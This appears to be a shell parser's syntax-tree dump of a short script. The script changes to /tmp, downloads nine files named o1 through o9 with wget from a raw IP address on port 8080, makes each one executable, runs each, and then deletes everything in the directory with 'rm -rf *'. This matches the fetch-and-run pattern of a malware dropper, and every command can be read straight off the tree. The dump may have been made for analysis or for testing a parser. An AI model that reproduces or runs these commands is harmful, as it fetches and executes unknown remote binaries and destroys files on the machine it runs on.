CommandNode(lineno=2, pos=(12, 19), parts=[
  WordNode(lineno=2, pos=(12, 14), word='cd'),
  WordNode(lineno=2, pos=(15, 19), word='/tmp'),
])
CommandNode(lineno=3, pos=(20, 52), parts=[
  WordNode(lineno=3, pos=(20, 24), word='wget'),
  WordNode(lineno=3, pos=(25, 52), word='http://45.32.40.154:8080/o1'),
])
CommandNode(lineno=4, pos=(53, 85), parts=[
  WordNode(lineno=4, pos=(53, 57), word='wget'),
  WordNode(lineno=4, pos=(58, 85), word='http://45.32.40.154:8080/o2'),
])
CommandNode(lineno=5, pos=(86, 118), parts=[
  WordNode(lineno=5, pos=(86, 90), word='wget'),
  WordNode(lineno=5, pos=(91, 118), word='http://45.32.40.154:8080/o3'),
])
CommandNode(lineno=6, pos=(119, 151), parts=[
  WordNode(lineno=6, pos=(119, 123), word='wget'),
  WordNode(lineno=6, pos=(124, 151), word='http://45.32.40.154:8080/o4'),
])
CommandNode(lineno=7, pos=(152, 184), parts=[
  WordNode(lineno=7, pos=(152, 156), word='wget'),
  WordNode(lineno=7, pos=(157, 184), word='http://45.32.40.154:8080/o5'),
])
CommandNode(lineno=8, pos=(185, 217), parts=[
  WordNode(lineno=8, pos=(185, 189), word='wget'),
  WordNode(lineno=8, pos=(190, 217), word='http://45.32.40.154:8080/o6'),
])
CommandNode(lineno=9, pos=(218, 250), parts=[
  WordNode(lineno=9, pos=(218, 222), word='wget'),
  WordNode(lineno=9, pos=(223, 250), word='http://45.32.40.154:8080/o7'),
])
CommandNode(lineno=10, pos=(251, 283), parts=[
  WordNode(lineno=10, pos=(251, 255), word='wget'),
  WordNode(lineno=10, pos=(256, 283), word='http://45.32.40.154:8080/o8'),
])
CommandNode(lineno=11, pos=(284, 316), parts=[
  WordNode(lineno=11, pos=(284, 288), word='wget'),
  WordNode(lineno=11, pos=(289, 316), word='http://45.32.40.154:8080/o9'),
])
CommandNode(lineno=14, pos=(335, 346), parts=[
  WordNode(lineno=14, pos=(335, 340), word='chmod'),
  WordNode(lineno=14, pos=(341, 343), word='+x'),
  WordNode(lineno=14, pos=(344, 346), word='o1'),
])
CommandNode(lineno=15, pos=(347, 358), parts=[
  WordNode(lineno=15, pos=(347, 352), word='chmod'),
  WordNode(lineno=15, pos=(353, 355), word='+x'),
  WordNode(lineno=15, pos=(356, 358), word='o2'),
])
CommandNode(lineno=16, pos=(359, 370), parts=[
  WordNode(lineno=16, pos=(359, 364), word='chmod'),
  WordNode(lineno=16, pos=(365, 367), word='+x'),
  WordNode(lineno=16, pos=(368, 370), word='o3'),
])
CommandNode(lineno=17, pos=(371, 382), parts=[
  WordNode(lineno=17, pos=(371, 376), word='chmod'),
  WordNode(lineno=17, pos=(377, 379), word='+x'),
  WordNode(lineno=17, pos=(380, 382), word='o4'),
])
CommandNode(lineno=18, pos=(383, 394), parts=[
  WordNode(lineno=18, pos=(383, 388), word='chmod'),
  WordNode(lineno=18, pos=(389, 391), word='+x'),
  WordNode(lineno=18, pos=(392, 394), word='o5'),
])
CommandNode(lineno=19, pos=(395, 406), parts=[
  WordNode(lineno=19, pos=(395, 400), word='chmod'),
  WordNode(lineno=19, pos=(401, 403), word='+x'),
  WordNode(lineno=19, pos=(404, 406), word='o6'),
])
CommandNode(lineno=20, pos=(407, 418), parts=[
  WordNode(lineno=20, pos=(407, 412), word='chmod'),
  WordNode(lineno=20, pos=(413, 415), word='+x'),
  WordNode(lineno=20, pos=(416, 418), word='o7'),
])
CommandNode(lineno=21, pos=(419, 430), parts=[
  WordNode(lineno=21, pos=(419, 424), word='chmod'),
  WordNode(lineno=21, pos=(425, 427), word='+x'),
  WordNode(lineno=21, pos=(428, 430), word='o8'),
])
CommandNode(lineno=22, pos=(431, 442), parts=[
  WordNode(lineno=22, pos=(431, 436), word='chmod'),
  WordNode(lineno=22, pos=(437, 439), word='+x'),
  WordNode(lineno=22, pos=(440, 442), word='o9'),
])
CommandNode(lineno=26, pos=(478, 482), parts=[
  WordNode(lineno=26, pos=(478, 482), word='./o1'),
])
CommandNode(lineno=27, pos=(483, 487), parts=[
  WordNode(lineno=27, pos=(483, 487), word='./o2'),
])
CommandNode(lineno=28, pos=(488, 492), parts=[
  WordNode(lineno=28, pos=(488, 492), word='./o3'),
])
CommandNode(lineno=29, pos=(493, 497), parts=[
  WordNode(lineno=29, pos=(493, 497), word='./o4'),
])
CommandNode(lineno=30, pos=(498, 502), parts=[
  WordNode(lineno=30, pos=(498, 502), word='./o5'),
])
CommandNode(lineno=31, pos=(503, 507), parts=[
  WordNode(lineno=31, pos=(503, 507), word='./o6'),
])
CommandNode(lineno=32, pos=(508, 512), parts=[
  WordNode(lineno=32, pos=(508, 512), word='./o7'),
])
CommandNode(lineno=33, pos=(513, 517), parts=[
  WordNode(lineno=33, pos=(513, 517), word='./o8'),
])
CommandNode(lineno=34, pos=(518, 522), parts=[
  WordNode(lineno=34, pos=(518, 522), word='./o9'),
])
CommandNode(lineno=38, pos=(558, 566), parts=[
  WordNode(lineno=38, pos=(558, 560), word='rm'),
  WordNode(lineno=38, pos=(561, 564), word='-rf'),
  WordNode(lineno=38, pos=(565, 566), word='*'),
])
